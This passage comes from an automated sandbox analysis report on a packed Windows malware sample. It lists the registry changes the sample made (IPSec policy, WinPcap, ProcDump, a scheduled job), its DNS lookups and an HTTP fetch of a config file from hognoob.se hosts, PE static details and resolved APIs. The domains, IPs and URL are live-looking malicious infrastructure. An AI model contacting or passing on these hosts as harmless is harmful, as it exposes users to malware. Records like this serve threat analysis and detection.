- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecISAKMPReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecNegotiationPolicyReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecPolicy{eb468226-9682-4032-8795-072f78553f00}\\ipsecNFAReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecNegotiationPolicyAction",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecNegotiationPolicyType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\Software\\WinPcap",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\WinPcap\\(Default)",
- "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\UninstallString",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\QuietUninstallString",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\DisplayIcon",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\DisplayName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\DisplayVersion",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\Publisher",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\URLInfoAbout",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\URLUpdateInfo",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\VersionMajor",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\VersionMinor",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\InstalledBy",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\NoModify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst\\NoRepair",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\className",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\name",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecID",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecDataType",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecData",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecNegotiationPolicyReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecFilterReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\whenChanged",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\ipsecOwnersReference",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ActivePolicy",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\IPSec",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IPSec\\OperationMode",
- "HKEY_CURRENT_USER\\Software\\Sysinternals\\ProcDump",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Sysinternals\\ProcDump\\EulaAccepted"
- ]
- [*] Deleted Registry Keys: [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{bbac8a54-f75e-4ca4-ad29-00155be243f1}\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{c5e3c849-6421-422d-bc93-d7ac5cfc0d69}\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNegotiationPolicy{d1b028e3-32e0-4912-b656-30e948406764}\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecFilter{f03b4a3d-3c58-44ef-a6af-f2c0aad538c6}\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\trztipllt.job",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\trztipllt.job.fp",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecNFA{109e7a7d-e345-43a2-9ca2-2d9f17a43a6a}\\description",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\IPSEC\\Policy\\Local\\ipsecISAKMPPolicy{80f22b43-211f-4b2e-8357-52828bee98f5}\\ipsecOwnersReference"
- ]
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "uio.hognoob.se",
- "answers": [
- {
- "data": "185.164.72.143",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "upa1.hognoob.se",
- "answers": [
- {
- "data": "172.105.237.113",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "upa2.hognoob.se",
- "answers": [
- {
- "data": "139.162.13.92",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "2019.ip138.com",
- "answers": [
- {
- "data": "183.250.88.67",
- "type": "A"
- },
- {
- "data": "3.ip138.com",
- "type": "CNAME"
- }
- ]
- },
- {
- "type": "A",
- "request": "pxi.hognoob.se",
- "answers": [
- {
- "data": "80.82.70.188",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "ifconfig.me",
- "answers": [
- {
- "data": "216.239.34.21",
- "type": "A"
- },
- {
- "data": "216.239.36.21",
- "type": "A"
- },
- {
- "data": "216.239.38.21",
- "type": "A"
- },
- {
- "data": "216.239.32.21",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "isrg.trustid.ocsp.identrust.com",
- "answers": [
- {
- "data": "isrg.trustid.ocsp.identrust.com.edgesuite.net",
- "type": "CNAME"
- },
- {
- "data": "a279.dscq.akamai.net",
- "type": "CNAME"
- },
- {
- "data": "2.21.71.25",
- "type": "A"
- },
- {
- "data": "2.21.71.34",
- "type": "A"
- }
- ]
- },
- {
- "type": "A",
- "request": "crl.identrust.com",
- "answers": [
- {
- "data": "192.35.177.64",
- "type": "A"
- },
- {
- "data": "apps.digsigtrust.com",
- "type": "CNAME"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "139.162.13.92",
- "domain": "upa2.hognoob.se"
- },
- {
- "ip": "2.21.71.25",
- "domain": "isrg.trustid.ocsp.identrust.com"
- },
- {
- "ip": "",
- "domain": "2019.ip138.com"
- },
- {
- "ip": "216.239.34.21",
- "domain": "ifconfig.me"
- },
- {
- "ip": "185.164.72.143",
- "domain": "uio.hognoob.se"
- },
- {
- "ip": "172.105.237.113",
- "domain": "upa1.hognoob.se"
- },
- {
- "ip": "192.35.177.64",
- "domain": "crl.identrust.com"
- },
- {
- "ip": "80.82.70.188",
- "domain": "pxi.hognoob.se"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 2,
- "body": "",
- "uri": "http://uio.hognoob.se:63145/cfg.ini",
- "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
- "method": "GET",
- "host": "uio.hognoob.se:63145",
- "version": "1.1",
- "path": "/cfg.ini",
- "data": "GET /cfg.ini HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\nAccept: */*\r\nHost: uio.hognoob.se:63145\r\nCache-Control: no-cache\r\n\r\n",
- "port": 63145
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "isrg.trustid.ocsp.identrust.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: isrg.trustid.ocsp.identrust.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://crl.identrust.com/DSTROOTCAX3CRL.crl",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "crl.identrust.com",
- "version": "1.1",
- "path": "/DSTROOTCAX3CRL.crl",
- "data": "GET /DSTROOTCAX3CRL.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.identrust.com\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "RegCloseKey",
- "address": "0xa9e154"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": null,
- "address": "0xa9e15c"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "ChooseColorA",
- "address": "0xa9e164"
- }
- ],
- "dll": "comdlg32.dll"
- },
- {
- "imports": [
- {
- "name": "Escape",
- "address": "0xa9e16c"
- }
- ],
- "dll": "GDI32.dll"
- },
- {
- "imports": [
- {
- "name": "GetAdaptersInfo",
- "address": "0xa9e174"
- }
- ],
- "dll": "iphlpapi.dll"
- },
- {
- "imports": [
- {
- "name": "LoadLibraryA",
- "address": "0xa9e17c"
- },
- {
- "name": "ExitProcess",
- "address": "0xa9e180"
- },
- {
- "name": "GetProcAddress",
- "address": "0xa9e184"
- },
- {
- "name": "VirtualProtect",
- "address": "0xa9e188"
- }
- ],
- "dll": "KERNEL32.DLL"
- },
- {
- "imports": [
- {
- "name": "OleRun",
- "address": "0xa9e190"
- }
- ],
- "dll": "ole32.dll"
- },
- {
- "imports": [
- {
- "name": "VariantCopy",
- "address": "0xa9e198"
- }
- ],
- "dll": "OLEAUT32.dll"
- },
- {
- "imports": [
- {
- "name": "RasHangUpA",
- "address": "0xa9e1a0"
- }
- ],
- "dll": "RASAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ShellExecuteA",
- "address": "0xa9e1a8"
- }
- ],
- "dll": "SHELL32.dll"
- },
- {
- "imports": [
- {
- "name": "GetDC",
- "address": "0xa9e1b0"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "VerQueryValueA",
- "address": "0xa9e1b8"
- }
- ],
- "dll": "VERSION.dll"
- },
- {
- "imports": [
- {
- "name": "InternetOpenA",
- "address": "0xa9e1c0"
- }
- ],
- "dll": "WININET.dll"
- },
- {
- "imports": [
- {
- "name": "waveOutOpen",
- "address": "0xa9e1c8"
- }
- ],
- "dll": "WINMM.dll"
- },
- {
- "imports": [
- {
- "name": "OpenPrinterA",
- "address": "0xa9e1d0"
- }
- ],
- "dll": "WINSPOOL.DRV"
- },
- {
- "imports": [
- {
- "name": "recvfrom",
- "address": "0xa9e1d8"
- }
- ],
- "dll": "WS2_32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x00539452",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x00a9d5b0",
- "timestamp": "2019-06-24 19:13:25",
- "osversion": "4.0",
- "sections": [
- {
- "name": "UPX0",
- "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x00000400",
- "virtual_size": "0x00170000",
- "characteristics_raw": "0xe0000080"
- },
- {
- "name": "UPX1",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00171000",
- "size_of_data": "0x0052c800",
- "entropy": "7.82",
- "raw_address": "0x00000400",
- "virtual_size": "0x0052d000",
- "characteristics_raw": "0xe0000040"
- },
- {
- "name": "UPX2",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0069e000",
- "size_of_data": "0x00000400",
- "entropy": "3.70",
- "raw_address": "0x0052cc00",
- "virtual_size": "0x00001000",
- "characteristics_raw": "0xc0000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0069e000",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000037c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "7e8fd41cc4af90fd0b2731fbcc919e1a",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 16,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "kernel32.dll.FileTimeToSystemTime",
- "kernel32.dll.GetTimeZoneInformation",
- "kernel32.dll.SetLastError",
- "kernel32.dll.GetSystemDirectoryA",
- "kernel32.dll.GetWindowsDirectoryA",
- "kernel32.dll.GetCurrentProcess",
- "kernel32.dll.MultiByteToWideChar",
- "kernel32.dll.WideCharToMultiByte",
- "kernel32.dll.Process32Next",
- "kernel32.dll.Process32First",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.SetFilePointer",
- "kernel32.dll.GetFileSize",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.OpenProcess",
- "kernel32.dll.GetVersion",
- "kernel32.dll.TerminateThread",
- "kernel32.dll.CreateSemaphoreA",
- "kernel32.dll.ResumeThread",
- "kernel32.dll.ReleaseSemaphore",
- "kernel32.dll.EnterCriticalSection",
- "kernel32.dll.LeaveCriticalSection",
- "kernel32.dll.GetProfileStringA",
- "kernel32.dll.WriteFile",
- "kernel32.dll.InterlockedExchange",
- "kernel32.dll.IsBadCodePtr",
- "kernel32.dll.CompareStringW",
- "kernel32.dll.CompareStringA",
- "kernel32.dll.GetStringTypeW",
- "kernel32.dll.GetStringTypeA",
- "kernel32.dll.SetUnhandledExceptionFilter",
- "kernel32.dll.IsBadWritePtr",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.LCMapStringW",
- "kernel32.dll.LCMapStringA",
- "kernel32.dll.SetEnvironmentVariableA",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.HeapCreate",
- "kernel32.dll.HeapDestroy",
- "kernel32.dll.GetEnvironmentVariableA",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.SetHandleCount",
- "kernel32.dll.GetEnvironmentStringsW",
- "kernel32.dll.GetEnvironmentStrings",
- "kernel32.dll.FreeEnvironmentStringsW",
- "kernel32.dll.FreeEnvironmentStringsA",
- "kernel32.dll.UnhandledExceptionFilter",
- "kernel32.dll.GetFileType",
- "kernel32.dll.SetStdHandle",
- "kernel32.dll.GetACP",
- "kernel32.dll.HeapSize",
- "kernel32.dll.RaiseException",
- "kernel32.dll.GetLocalTime",
- "kernel32.dll.GetSystemTime",
- "kernel32.dll.RtlUnwind",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.GetOEMCP",
- "kernel32.dll.GetCPInfo",
- "kernel32.dll.GetProcessVersion",
- "kernel32.dll.SetErrorMode",
- "kernel32.dll.GlobalFlags",
- "kernel32.dll.GetCurrentThread",
- "kernel32.dll.GetFileTime",
- "kernel32.dll.TlsGetValue",
- "kernel32.dll.LocalReAlloc",
- "kernel32.dll.TlsSetValue",
- "kernel32.dll.TlsFree",
- "kernel32.dll.GlobalHandle",
- "kernel32.dll.TlsAlloc",
- "kernel32.dll.LocalAlloc",
- "kernel32.dll.lstrcmpA",
- "kernel32.dll.GlobalGetAtomNameA",
- "kernel32.dll.GlobalAddAtomA",
- "kernel32.dll.GlobalFindAtomA",
- "kernel32.dll.GlobalDeleteAtom",
- "kernel32.dll.lstrcmpiA",
- "kernel32.dll.SetEndOfFile",
- "kernel32.dll.UnlockFile",
- "kernel32.dll.LockFile",
- "kernel32.dll.FlushFileBuffers",
- "kernel32.dll.DuplicateHandle",
- "kernel32.dll.lstrcpynA",
- "kernel32.dll.FileTimeToLocalFileTime",
- "kernel32.dll.LocalFree",
- "kernel32.dll.InterlockedDecrement",
- "kernel32.dll.InterlockedIncrement",
- "kernel32.dll.WaitForMultipleObjects",
- "kernel32.dll.CreateFileA",
- "kernel32.dll.SetEvent",
- "kernel32.dll.FindResourceA",
- "kernel32.dll.LoadResource",
- "kernel32.dll.LockResource",
- "kernel32.dll.ReadFile",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.WaitForSingleObject",
- "kernel32.dll.CreateProcessA",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.GetCommandLineA",
- "kernel32.dll.MulDiv",
- "kernel32.dll.GetProcAddress",
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.GetVolumeInformationA",
- "kernel32.dll.SetCurrentDirectoryA",
- "kernel32.dll.CreateDirectoryA",
- "kernel32.dll.CopyFileA",
- "kernel32.dll.DeleteFileA",
- "kernel32.dll.lstrlenW",
- "kernel32.dll.RemoveDirectoryA",
- "kernel32.dll.GetModuleFileNameA",
- "kernel32.dll.GetCurrentThreadId",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.GlobalSize",
